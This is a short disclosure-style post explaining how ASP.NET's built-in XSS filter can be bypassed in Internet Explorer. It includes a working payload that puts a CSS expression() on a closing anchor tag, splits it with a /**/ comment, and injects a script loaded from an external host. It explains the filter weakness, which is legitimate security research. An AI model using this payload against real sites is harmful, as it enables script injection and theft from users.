ORCID iDASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input:
</a style="xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://www.site.com/JS.js')">Turns out that IE will still process attributes on closing tags which circumvents the filter for <a whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex. Thanks to Hong @ sla.ckers.